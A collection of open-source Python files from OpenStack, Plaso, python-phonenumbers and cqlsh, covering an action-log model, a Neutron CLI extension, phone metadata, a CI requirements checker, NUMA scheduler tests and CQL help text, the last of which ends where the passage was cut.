# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nailgun.db import db
from nailgun.db.sqlalchemy import models
from nailgun import consts
from nailgun.objects import NailgunCollection
from nailgun.objects import NailgunObject
from nailgun.objects.serializers.action_log import ActionLogSerializer
class ActionLog(NailgunObject):
#: SQLAlchemy model for ActionLog
model = models.ActionLog
#: Serializer for ActionLog
serializer = ActionLogSerializer
#: JSON schema for ActionLog
schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "ActionLog",
"description": "Serialized ActionLog object",
"type": "object",
"properties": {
"id": {"type": "number"},
"actor_id": {"type": ["string", "null"]},
"action_group": {"type": "string"},
"action_name": {"type": "string"},
"action_type": {
"type": "string",
"enum": list(consts.ACTION_TYPES)
},
"start_timestamp": {"type": "string"},
"end_timestamp": {"type": "string"},
"additional_info": {"type": "object"},
"is_sent": {"type": "boolean"},
"cluster_id": {"type": ["number", "null"]},
"task_uuid": {"type": ["string", "null"]}
}
}
@classmethod
def update(cls, instance, data):
"""Form additional info for further instance update.
Extend corresponding method of the parent class.
Side effects:
overrides already present keys of additional_info attribute
of instance if this attribute is present in data argument
:param instance: instance of ActionLog class that is processed
:param data: dictionary containing keyword arguments for entity to be
updated
:return: returned by parent class method value
"""
if data.get('additional_info'):
add_info = dict(instance.additional_info)
add_info.update(data['additional_info'])
data['additional_info'] = add_info
return super(ActionLog, cls).update(instance, data)
@classmethod
def get_by_kwargs(cls, **kwargs):
"""Get action_log entry by set of attributes values.
:return: - matching instance of action_log entity
"""
instance = db().query(models.ActionLog)\
.filter_by(**kwargs)\
.first()
return instance
class ActionLogCollection(NailgunCollection):
single = ActionLog
|
nebril/fuel-web
|
nailgun/nailgun/objects/action_log.py
|
Python
|
apache-2.0
| 3,128
|
# Copyright 2015 Cisco Systems.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from __future__ import print_function
from networking_cisco._i18n import _
from neutronclient.common import extension
from neutronclient.neutron import v2_0 as neutronV20
from neutronclient.neutron.v2_0 import router
from networking_cisco.neutronclient import hostingdevice
R_RESOURCE = 'router'
DEVICE_L3_ROUTERS = '/hosting-device-l3-routers'
class RoutersOnHostingDevice(extension.NeutronClientExtension):
resource = R_RESOURCE
resource_plural = '%ss' % resource
object_path = '/%s' % resource_plural
resource_path = '/%s/%%s' % resource_plural
versions = ['2.0']
allow_names = True
class AddRouterToHostingDevice(extension.ClientExtensionCreate,
RoutersOnHostingDevice):
"""Add a router to hosting device."""
shell_command = 'cisco-hosting-device-router-add'
def get_parser(self, prog_name):
parser = super(AddRouterToHostingDevice, self).get_parser(prog_name)
parser.add_argument(
'hosting_device',
help=_('Name or id of the hosting device.'))
parser.add_argument(
'router',
help=_('Name or id of router to add.'))
return parser
def execute(self, parsed_args):
self.log.debug('run(%s)' % parsed_args)
neutron_client = self.get_client()
neutron_client.format = parsed_args.request_format
_id_hd = neutronV20.find_resourceid_by_name_or_id(
neutron_client, 'hosting_device', parsed_args.hosting_device)
_id_r = neutronV20.find_resourceid_by_name_or_id(
neutron_client, 'router', parsed_args.router)
self.add_router_to_hosting_device(neutron_client, _id_hd,
{'router_id': _id_r})
print(_('Added router \'%(router)s\' to hosting device \'%(hd)s\'') % {
'router': parsed_args.router, 'hd': parsed_args.hosting_device},
file=self.app.stdout, end='')
return [], []
def add_router_to_hosting_device(self, client, hosting_device_id, body):
"""Adds a router to hosting device."""
res_path = hostingdevice.HostingDevice.resource_path
return client.post((res_path + DEVICE_L3_ROUTERS) %
hosting_device_id, body=body)
class RemoveRouterFromHostingDevice(extension.ClientExtensionCreate,
RoutersOnHostingDevice):
"""Remove a router from Hosting Device."""
shell_command = 'cisco-hosting-device-router-remove'
def get_parser(self, prog_name):
parser = super(RemoveRouterFromHostingDevice, self).get_parser(
prog_name)
parser.add_argument(
'hosting_device',
help=_('Name or id of the hosting device.'))
parser.add_argument(
'router',
help=_('Name or id of router to remove.'))
return parser
def execute(self, parsed_args):
self.log.debug('run(%s)' % parsed_args)
neutron_client = self.get_client()
neutron_client.format = parsed_args.request_format
_id_hd = neutronV20.find_resourceid_by_name_or_id(
neutron_client, 'hosting_device', parsed_args.hosting_device)
_id_r = neutronV20.find_resourceid_by_name_or_id(
neutron_client, 'router', parsed_args.router)
self.remove_router_from_hosting_device(neutron_client, _id_hd, _id_r)
print(_('Removed router \'%(router)s\' from hosting device \'%(hd)s\'')
% {'router': parsed_args.router,
'hd': parsed_args.hosting_device}, file=self.app.stdout,
end='')
return [], []
def remove_router_from_hosting_device(self, client, hosting_device_id,
router_id):
"""Remove a router from hosting_device."""
res_path = hostingdevice.HostingDevice.resource_path
return client.delete((res_path + DEVICE_L3_ROUTERS + "/%s") % (
hosting_device_id, router_id))
class RoutersOnHostingDeviceList(extension.ClientExtensionList,
RoutersOnHostingDevice):
shell_command = 'cisco-hosting-device-list-hosted-routers'
_formatters = {'external_gateway_info':
router._format_external_gateway_info}
list_columns = ['id', 'name', 'external_gateway_info']
def get_parser(self, prog_name):
parser = super(RoutersOnHostingDeviceList, self).get_parser(prog_name)
parser.add_argument(
'hosting_device',
help=_('Name or id of the hosting device to query.'))
return parser
def call_server(self, neutron_client, search_opts, parsed_args):
_id = neutronV20.find_resourceid_by_name_or_id(
neutron_client, 'hosting_device', parsed_args.hosting_device)
data = self.list_routers_on_hosting_device(neutron_client, _id,
**search_opts)
return data
def list_routers_on_hosting_device(self, client, hosting_device_id,
**_params):
"""Fetches a list of routers hosted on a hosting device."""
res_path = hostingdevice.HostingDevice.resource_path
return client.get((res_path + DEVICE_L3_ROUTERS) %
hosting_device_id, params=_params)
HD_RESOURCE = 'hosting_device'
L3_ROUTER_DEVICES = '/l3-router-hosting-devices'
class HostingDeviceHostingRouter(extension.NeutronClientExtension):
resource = HD_RESOURCE
resource_plural = '%ss' % resource
object_path = '/%s' % resource_plural
resource_path = '/%s/%%s' % resource_plural
versions = ['2.0']
allow_names = True
class HostingDeviceHostingRouterList(extension.ClientExtensionList,
HostingDeviceHostingRouter):
shell_command = 'cisco-router-list-hosting-devices'
list_columns = ['id', 'name', 'status', 'admin_state_up', 'template_id']
def get_parser(self, prog_name):
parser = super(HostingDeviceHostingRouterList, self).get_parser(
prog_name)
parser.add_argument('router',
help=_('Name or id of router to query.'))
return parser
def call_server(self, neutron_client, search_opts, parsed_args):
_id = neutronV20.find_resourceid_by_name_or_id(
neutron_client, 'router', parsed_args.router)
data = self.list_hosting_devices_hosting_routers(neutron_client, _id,
**search_opts)
return data
def list_hosting_devices_hosting_routers(self, client, router_id,
**_params):
"""Fetches a list of hosting devices hosting a router."""
return client.get((client.router_path + L3_ROUTER_DEVICES) %
router_id, params=_params)
|
Gitweijie/first_project
|
networking_cisco/neutronclient/routerscheduler.py
|
Python
|
apache-2.0
| 7,544
|
# -*- coding: utf-8 -*-
from plaso.parsers.bencode_plugins import transmission
from plaso.parsers.bencode_plugins import utorrent
|
ostree/plaso
|
plaso/parsers/bencode_plugins/__init__.py
|
Python
|
apache-2.0
| 131
|
"""Auto-generated file, do not edit by hand. IE metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_IE = PhoneMetadata(id='IE', country_code=None, international_prefix=None,
general_desc=PhoneNumberDesc(national_number_pattern='[159]\\d{2,5}', possible_number_pattern='\\d{3,6}'),
toll_free=PhoneNumberDesc(national_number_pattern='116(?:00[06]|1(?:11|23))', possible_number_pattern='\\d{6}', example_number='116000'),
premium_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
emergency=PhoneNumberDesc(national_number_pattern='112|999', possible_number_pattern='\\d{3}', example_number='112'),
short_code=PhoneNumberDesc(national_number_pattern='11(?:2|6(?:00[06]|1(?:11|23)))|51210|999', possible_number_pattern='\\d{3,6}', example_number='112'),
standard_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
carrier_specific=PhoneNumberDesc(national_number_pattern='51210', possible_number_pattern='\\d{5}'),
short_data=True)
|
roubert/python-phonenumbers
|
python/phonenumbers/shortdata/region_IE.py
|
Python
|
apache-2.0
| 1,071
|
#! /usr/bin/env python
# Copyright (C) 2011 OpenStack, LLC.
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import collections
import contextlib
import os
import shlex
import shutil
import subprocess
import sys
import tempfile
requirement = None
project = None
def run_command(cmd):
print(cmd)
cmd_list = shlex.split(str(cmd))
p = subprocess.Popen(cmd_list, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
if p.returncode != 0:
raise SystemError(err)
return (out.strip(), err.strip())
class RequirementsList(object):
def __init__(self, name, project):
self.name = name
self.reqs_by_file = {}
self.project = project
self.failed = False
@property
def reqs(self):
return {k: v for d in self.reqs_by_file.values()
for k, v in d.items()}
def extract_reqs(self, content):
reqs = collections.defaultdict(set)
parsed = requirement.parse(content)
for name, entries in parsed.items():
if not name:
# Comments and other unprocessed lines
continue
list_reqs = [r for (r, line) in entries]
# Strip the comments out before checking if there are duplicates
list_reqs_stripped = [r._replace(comment='') for r in list_reqs]
if len(list_reqs_stripped) != len(set(list_reqs_stripped)):
print("Requirements file has duplicate entries "
"for package %s : %r." % (name, list_reqs))
self.failed = True
reqs[name].update(list_reqs)
return reqs
def process(self, strict=True):
"""Convert the project into ready to use data.
- an iterable of requirement sets to check
- each set has the following rules:
- each has a list of Requirements objects
- duplicates are not permitted within that list
"""
print("Checking %(name)s" % {'name': self.name})
# First, parse.
for fname, content in self.project.get('requirements', {}).items():
print("Processing %(fname)s" % {'fname': fname})
if strict and not content.endswith('\n'):
print("Requirements file %s does not "
"end with a newline." % fname)
self.reqs_by_file[fname] = self.extract_reqs(content)
for name, content in project.extras(self.project).items():
print("Processing .[%(extra)s]" % {'extra': name})
self.reqs_by_file[name] = self.extract_reqs(content)
def grab_args():
"""Grab and return arguments"""
parser = argparse.ArgumentParser(
description="Check if project requirements have changed"
)
parser.add_argument('--local', action='store_true',
help='check local changes (not yet in git)')
parser.add_argument('branch', nargs='?', default='master',
help='target branch for diffs')
parser.add_argument('--zc', help='what zuul cloner to call')
parser.add_argument('--reqs', help='use a specified requirements tree')
return parser.parse_args()
@contextlib.contextmanager
def tempdir():
try:
reqroot = tempfile.mkdtemp()
yield reqroot
finally:
shutil.rmtree(reqroot)
def install_and_load_requirements(reqroot, reqdir):
sha = run_command("git --git-dir %s/.git rev-parse HEAD" % reqdir)[0]
print "requirements git sha: %s" % sha
req_venv = os.path.join(reqroot, 'venv')
req_pip = os.path.join(req_venv, 'bin/pip')
req_lib = os.path.join(req_venv, 'lib/python2.7/site-packages')
out, err = run_command("virtualenv " + req_venv)
out, err = run_command(req_pip + " install " + reqdir)
sys.path.append(req_lib)
global project
global requirement
from openstack_requirements import project # noqa
from openstack_requirements import requirement # noqa
def _is_requirement_in_global_reqs(req, global_reqs):
# Compare all fields except the extras field as the global
# requirements should not have any lines with the extras syntax
# example: oslo.db[xyz]<1.2.3
for req2 in global_reqs:
if (req.package == req2.package and
req.location == req2.location and
req.specifiers == req2.specifiers and
req.markers == req2.markers and
req.comment == req2.comment):
return True
return False
def main():
args = grab_args()
branch = args.branch
failed = False
# build a list of requirements from the global list in the
# openstack/requirements project so we can match them to the changes
with tempdir() as reqroot:
# Only clone requirements repo if no local repo is specified
# on the command line.
if args.reqs is None:
reqdir = os.path.join(reqroot, "openstack/requirements")
if args.zc is not None:
zc = args.zc
else:
zc = '/usr/zuul-env/bin/zuul-cloner'
out, err = run_command("%(zc)s "
"--cache-dir /opt/git "
"--workspace %(root)s "
"git://git.openstack.org "
"openstack/requirements"
% dict(zc=zc, root=reqroot))
print out
print err
else:
reqdir = args.reqs
install_and_load_requirements(reqroot, reqdir)
global_reqs = requirement.parse(
open(reqdir + '/global-requirements.txt', 'rt').read())
for k, entries in global_reqs.items():
# Discard the lines: we don't need them.
global_reqs[k] = set(r for (r, line) in entries)
cwd = os.getcwd()
# build a list of requirements in the proposed change,
# and check them for style violations while doing so
head = run_command("git rev-parse HEAD")[0]
head_proj = project.read(cwd)
head_reqs = RequirementsList('HEAD', head_proj)
# Don't apply strict parsing rules to stable branches.
# Reasoning is:
# - devstack etc protect us from functional issues
# - we're backporting to stable, so guarding against
# aesthetics and DRY concerns is not our business anymore
# - if in future we have other not-functional linty style
# things to add, we don't want them to affect stable
# either.
head_strict = not branch.startswith('stable/')
head_reqs.process(strict=head_strict)
if not args.local:
# build a list of requirements already in the target branch,
# so that we can create a diff and identify what's being changed
run_command("git remote update")
run_command("git checkout remotes/origin/%s" % branch)
branch_proj = project.read(cwd)
# switch back to the proposed change now
run_command("git checkout %s" % head)
else:
branch_proj = {'root': cwd}
branch_reqs = RequirementsList(branch, branch_proj)
# Don't error on the target branch being broken.
branch_reqs.process(strict=False)
# iterate through the changing entries and see if they match the global
# equivalents we want enforced
for fname, freqs in head_reqs.reqs_by_file.items():
print("Validating %(fname)s" % {'fname': fname})
for name, reqs in freqs.items():
counts = {}
if (name in branch_reqs.reqs and
reqs == branch_reqs.reqs[name]):
# Unchanged [or a change that preserves a current value]
continue
if name not in global_reqs:
failed = True
print("Requirement %s not in openstack/requirements" %
str(reqs))
continue
if reqs == global_reqs[name]:
continue
for req in reqs:
if req.extras:
for extra in req.extras:
counts[extra] = counts.get(extra, 0) + 1
else:
counts[''] = counts.get('', 0) + 1
if not _is_requirement_in_global_reqs(
req, global_reqs[name]):
failed = True
print("Requirement for package %s : %s does "
"not match openstack/requirements value : %s" % (
name, str(req), str(global_reqs[name])))
for extra, count in counts.items():
if count != len(global_reqs[name]):
failed = True
print("Package %s%s requirement does not match "
"number of lines (%d) in "
"openstack/requirements" % (
name,
('[%s]' % extra) if extra else '',
len(global_reqs[name])))
# report the results
if failed or head_reqs.failed or branch_reqs.failed:
sys.exit(1)
print("Updated requirements match openstack/requirements.")
if __name__ == '__main__':
main()
|
hedvig/project-config
|
jenkins/scripts/project-requirements-change.py
|
Python
|
apache-2.0
| 10,166
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_serialization import jsonutils
from nova import objects
from nova.objects import base as obj_base
from nova.scheduler.filters import numa_topology_filter
from nova import test
from nova.tests.unit import fake_instance
from nova.tests.unit.scheduler import fakes
from nova.virt import hardware
class TestNUMATopologyFilter(test.NoDBTestCase):
def setUp(self):
super(TestNUMATopologyFilter, self).setUp()
self.filt_cls = numa_topology_filter.NUMATopologyFilter()
def test_numa_topology_filter_pass(self):
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
objects.InstanceNUMACell(id=1, cpuset=set([3]), memory=512)
])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY,
'pci_stats': None})
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
def test_numa_topology_filter_numa_instance_no_numa_host_fail(self):
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
objects.InstanceNUMACell(id=1, cpuset=set([3]), memory=512)
])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1', {'pci_stats': None})
self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
def test_numa_topology_filter_numa_host_no_numa_instance_pass(self):
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = None
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY})
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
def test_numa_topology_filter_fail_fit(self):
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
objects.InstanceNUMACell(id=1, cpuset=set([2]), memory=512),
objects.InstanceNUMACell(id=2, cpuset=set([3]), memory=512)
])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY,
'pci_stats': None})
self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
def test_numa_topology_filter_fail_memory(self):
self.flags(ram_allocation_ratio=1)
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]),
memory=1024),
objects.InstanceNUMACell(id=1, cpuset=set([3]), memory=512)
])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY,
'pci_stats': None})
self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
def test_numa_topology_filter_fail_cpu(self):
self.flags(cpu_allocation_ratio=1)
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
objects.InstanceNUMACell(id=1, cpuset=set([3, 4, 5]),
memory=512)])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY,
'pci_stats': None})
self.assertFalse(self.filt_cls.host_passes(host, filter_properties))
def test_numa_topology_filter_pass_set_limit(self):
self.flags(cpu_allocation_ratio=21)
self.flags(ram_allocation_ratio=1.3)
instance_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell(id=0, cpuset=set([1]), memory=512),
objects.InstanceNUMACell(id=1, cpuset=set([3]), memory=512)
])
instance = fake_instance.fake_instance_obj(mock.sentinel.ctx)
instance.numa_topology = instance_topology
filter_properties = {
'request_spec': {
'instance_properties': jsonutils.to_primitive(
obj_base.obj_to_primitive(instance))}}
host = fakes.FakeHostState('host1', 'node1',
{'numa_topology': fakes.NUMA_TOPOLOGY,
'pci_stats': None})
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
limits_topology = hardware.VirtNUMALimitTopology.from_json(
host.limits['numa_topology'])
self.assertEqual(limits_topology.cells[0].cpu_limit, 42)
self.assertEqual(limits_topology.cells[1].cpu_limit, 42)
self.assertEqual(limits_topology.cells[0].memory_limit, 665)
self.assertEqual(limits_topology.cells[1].memory_limit, 665)
|
orbitfp7/nova
|
nova/tests/unit/scheduler/filters/test_numa_topology_filters.py
|
Python
|
apache-2.0
| 7,379
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .cql3handling import simple_cql_types
class CQLHelpTopics(object):
def get_help_topics(self):
return [ t[5:] for t in dir(self) if t.startswith('help_') ]
def print_help_topic(self, topic):
getattr(self, 'help_' + topic.lower())()
def help_types(self):
print "\n CQL types recognized by this version of cqlsh:\n"
for t in simple_cql_types:
print ' ' + t
print """
For information on the various recognizable input formats for these
types, or on controlling the formatting of cqlsh query output, see
one of the following topics:
HELP TIMESTAMP_INPUT
HELP BLOB_INPUT
HELP UUID_INPUT
HELP BOOLEAN_INPUT
HELP TEXT_OUTPUT
HELP TIMESTAMP_OUTPUT
"""
def help_timestamp_input(self):
print """
Timestamp input
CQL supports any of the following ISO 8601 formats for timestamp
specification:
yyyy-mm-dd HH:mm
yyyy-mm-dd HH:mm:ss
yyyy-mm-dd HH:mmZ
yyyy-mm-dd HH:mm:ssZ
yyyy-mm-dd'T'HH:mm
yyyy-mm-dd'T'HH:mmZ
yyyy-mm-dd'T'HH:mm:ss
yyyy-mm-dd'T'HH:mm:ssZ
yyyy-mm-dd
yyyy-mm-ddZ
The Z in these formats refers to an RFC-822 4-digit time zone,
expressing the time zone's difference from UTC. For example, a
timestamp in Pacific Standard Time might be given thus:
2012-01-20 16:14:12-0800
If no time zone is supplied, the current time zone for the Cassandra
server node will be used.
"""
def help_blob_input(self):
print """
Blob input
CQL blob data must be specified in a string literal as hexidecimal
data. Example: to store the ASCII values for the characters in the
string "CQL", use '43514c'.
"""
def help_uuid_input(self):
print """
UUID input
UUIDs may be specified in CQL using 32 hexidecimal characters,
split up using dashes in the standard UUID format:
XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
"""
def help_boolean_input(self):
print """
Boolean input
CQL accepts the strings 'true' and 'false' (case insensitive)
as input for boolean types.
"""
def help_timestamp_output(self):
print """
Timestamp output
Cqlsh will display timestamps in the following format by default:
yyyy-mm-dd HH:mm:ssZ
which is a format acceptable as CQL timestamp input as well.
The output format can be changed by setting 'time_format' property
in the [ui] section of .cqlshrc file.
"""
def help_text_output(self):
print """
Textual output
When control characters, or other characters which can't be encoded
in your current locale, are found in values of 'text' or 'ascii'
types, it will be shown as a backslash escape. If color is enabled,
any such backslash escapes will be shown in a different color from
the surrounding text.
Unicode code points in your data will be output intact, if the
encoding for your locale is capable of decoding them. If you prefer
that non-ascii characters be shown with Python-style "\\uABCD"
escape sequences, invoke cqlsh with an ASCII locale (for example,
by setting the $LANG environment variable to "C").
"""
help_ascii_output = help_text_output
def help_create_index(self):
print """
CREATE INDEX [<indexname>] ON <cfname> ( <colname> );
A CREATE INDEX statement is used to create a new, automatic secondary
index on the given CQL table, for the named column. A name for the
index itself can be specified before the ON keyword, if desired. A
single column name must be specified inside the parentheses. It is not
necessary for the column to exist on any current rows (Cassandra is
schema-optional), but the column must already have a type (specified
during the CREATE TABLE, or added afterwards with ALTER TABLE).
"""
def help_drop(self):
print """
There are different variants of DROP. For more information, see
one of the following:
HELP DROP_KEYSPACE;
HELP DROP_TABLE;
HELP DROP_INDEX;
"""
def help_drop_keyspace(self):
print """
DROP KEYSPACE <keyspacename>;
A DROP KEYSPACE statement results in the immediate, irreversible
removal of a keyspace, including all column families in it, and all
data contained in those column families.
"""
def help_drop_table(self):
print """
DROP TABLE <tablename>;
A DROP TABLE statement results in the immediate, irreversible
removal of a CQL table and the underlying column family, including all
data contained in it.
"""
help_drop_columnfamily = help_drop_table
def help_drop_index(self):
print """
DROP INDEX <indexname>;
A DROP INDEX statement is used to drop an existing secondary index.
"""
def help_truncate(self):
print """
TRUNCATE <tablename>;
TRUNCATE accepts a single argument for the table name, and permanently
removes all data from it.
"""
def help_create(self):
print """
There are different variants of CREATE. For more information, see
one of the following:
HELP CREATE_KEYSPACE;
HELP CREATE_TABLE;
HELP CREATE_INDEX;
"""
def help_use(self):
print """
USE <keyspacename>;
Tells cqlsh and the connected Cassandra instance that you will be
working in the given keyspace. All subsequent operations on tables
or indexes will be in the context of this keyspace, unless otherwise
specified, until another USE command is issued or the connection
terminates.
As always, when a keyspace name does not work as a normal identifier or
number, it can be quoted using single quotes (CQL 2) or double quotes
(CQL 3).
"""
def help_create_table(self):
print """
CREATE TABLE <cfname> ( <colname> <type> PRIMARY KEY [,
<colname> <type> [, ...]] )
[WITH <optionname> = <val> [AND <optionname> = <val> [...]]];
CREATE TABLE statements create a new CQL table under the current
keyspace. Valid table names are strings of alphanumeric characters and
underscores, which begin with a letter.
Each table requires a primary key, which will correspond to the
underlying columnfamily key and key validator. It's important to
note that the key type you use must be compatible with the partitioner
in use. For example, OrderPreservingPartitioner and
CollatingOrderPreservingPartitioner both require UTF-8 keys.
In cql3 mode, a table can have multiple columns composing the primary
key (see HELP COMPOUND_PRIMARY_KEYS).
For more information, see one of the following:
HELP CREATE_TABLE_TYPES;
HELP CREATE_TABLE_OPTIONS;
"""
help_create_columnfamily = help_create_table
def help_compound_primary_keys(self):
print """
CREATE TABLE <cfname> ( <partition_key> <type>, <clustering_key1> type, <clustering_key2> type,
[, ...]], PRIMARY KEY (<partition_key>, <clustering_key1>, <clustering_key2>);
CREATE TABLE allows a primary key composed of multiple columns. When this is the case, specify
the columns that take part in the compound key after all columns have been specified.
, PRIMARY KEY( <key1>, <key2>, ... )
The partitioning key itself can be a compound key, in which case the first element of the PRIMARY KEY
phrase should be parenthesized, as
PRIMARY KEY ((<partition_key_part1>, <partition_key_part2>), <clustering_key>)
"""
def help_create_table_types(self):
print """
CREATE TABLE: Specifying column types
CREATE ... (KEY <type> PRIMARY KEY,
othercol <type>) ...
It is possible to assign columns a type during table creation. Columns
configured with a type are validated accordingly when a write occurs,
and intelligent CQL drivers and interfaces will be able to decode the
column values correctly when receiving them. Column types are specified
as a parenthesized, comma-separated list of column term and type pairs.
See HELP TYPES; for the list of recognized types.
"""
help_create_columnfamily_types = help_create_table_types
def help_create_table_options(self):
print """
CREATE TABLE: Specifying columnfamily options
CREATE TABLE blah (...)
WITH optionname = val AND otheroption = val2;
A number of optional keyword arguments can be supplied to control the
configuration of a new CQL table, such as the size of the associated
row and key caches for the underlying Cassandra columnfamily. Consult
your CQL reference for the complete list of options and possible
values.
"""
help_create_columnfamily_options = help_create_table_options
def help_alter_alter(self):
print """
ALTER TABLE: altering existing typed columns
ALTER TABLE addamsFamily ALTER lastKnownLocation TYPE uuid;
ALTER TABLE ... ALTER changes the expected storage type for a column.
The column must already have a type in the column family metadata. The
column may or may not already exist in current rows-- but be aware that
no validation of existing data is done. The bytes stored in values for
that column will remain unchanged, and if existing data is not
deserializable according to the new type, this may cause your CQL
driver or interface to report errors.
"""
def help_alter_add(self):
print """
ALTER TABLE: adding a typed column
ALTER TABLE addamsFamily ADD gravesite varchar;
The ALTER TABLE ... ADD variant adds a typed column to a column
family. The column must not already have a type in the column family
metadata. See the warnings on HELP ALTER_ALTER regarding the lack of
validation of existing data; they apply here as well.
"""
def help_alter_drop(self):
print """
ALTER TABLE: dropping a typed column
ALTER TABLE addamsFamily DROP gender;
An ALTER TABLE ... DROP statement removes the type of a column
from the column family metadata. Note that this does _not_ remove the
column from current rows; it just removes the metadata saying that the
bytes stored under that column are expected to be deserializable
according to a certain type.
"""
def help_alter_with(self):
print """
ALTER TABLE: changing column family properties
ALTER TABLE addamsFamily WITH comment = 'Glad to be here!'
AND read_repair_chance = 0.2;
An ALTER TABLE ... WITH statement makes adjustments to the
table properties, as defined when the table was created (see
HELP CREATE_TABLE_OPTIONS and your Cassandra documentation for
information about the supported parameter names and values).
"""
def help_delete_columns(self):
print """
DELETE: specifying columns
DELETE col1, col2, col3 FROM ...
Following the DELETE keyword is an optional comma-delimited list of
column name terms. When no column names are given, the remove applies
to the entire row(s) matched by the WHERE clause.
When column names do not parse as valid CQL identifiers, they can be
quoted in single quotes (CQL 2) or double quotes (CQL 3).
"""
def help_delete_where(self):
print """
DELETE: specifying rows
DELETE ... WHERE keycol = 'some_key_value';
DELETE ... WHERE keycol1 = 'val1' AND keycol2 = 'val2';
DELETE ... WHERE keycol IN (key1, key2);
The WHERE clause is used to determine to which row(s) a DELETE
applies. The first form allows the specification of a precise row
by specifying a particular primary key value (if the primary key has
multiple columns, values for each must be given). The second form
allows a list of key values to be specified using the IN operator
and a parenthesized list of comma-delimited key values.
"""
def help_update_set(self):
print """
UPDATE: Specifying Columns and Row
UPDATE ... SET name1 = value1, name2 = value2
WHERE <key> = keyname;
UPDATE ... SET name1 = value1, name2 = value2
WHERE <key> IN ('<key1>', '<key2>', ...)
Rows are created or updated by supplying column names and values in
term assignment format. Multiple columns can be set by separating the
name/value pairs using commas.
"""
def help_update_counters(self):
print """
